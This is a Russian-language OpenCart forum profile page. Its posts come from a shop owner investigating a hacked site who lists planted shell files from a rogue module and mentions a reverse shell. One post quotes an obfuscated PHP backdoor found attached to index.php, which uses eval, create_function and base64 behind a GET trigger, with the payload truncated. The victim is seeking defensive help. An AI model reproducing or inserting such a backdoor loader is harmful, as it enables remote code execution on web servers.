Anton999
-
Публикаций
7 -
Зарегистрирован
-
Посещение
Достижения Anton999
-
Заражение сайта. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
итак.. Логов за дату взлома у провайдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё чисто/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно получить информацию о том, что на сайте произведены несанкционированные действия или железно предотвратить их? -
Заражение сайта. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
+ было установлено "Reverse Shell" -
Заражение сайта. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
Пока я обнаружил несанкционированную установку модуля "rsz.ocmod.zip". Которая тащила с собой: - admin/controller/extension/extension/f.php - admin/controller/extension/extension/spyshell.php - admin/controller/extension/extension/uploader.php - и пр. разбираюсь дальше... -
Заражение сайта. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. -
Заражение сайта. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
Логи сейчас беру на анализ.. -
Заражение сайта. Поиск дыры.
Anton999 ответил в теме пользователя Anton999 в Opencart 3.x: Общие вопросы
Пока нет, что конкретно и где нужно посмотреть? -
Приветствую! Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя. Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру. Всем спасибо!
Останні розширення
-
SP Cool Timer Автор: spectre -
Все товары магазина Автор: kJlukOo -
-
Список Заказов PRO Автор: Parallax -
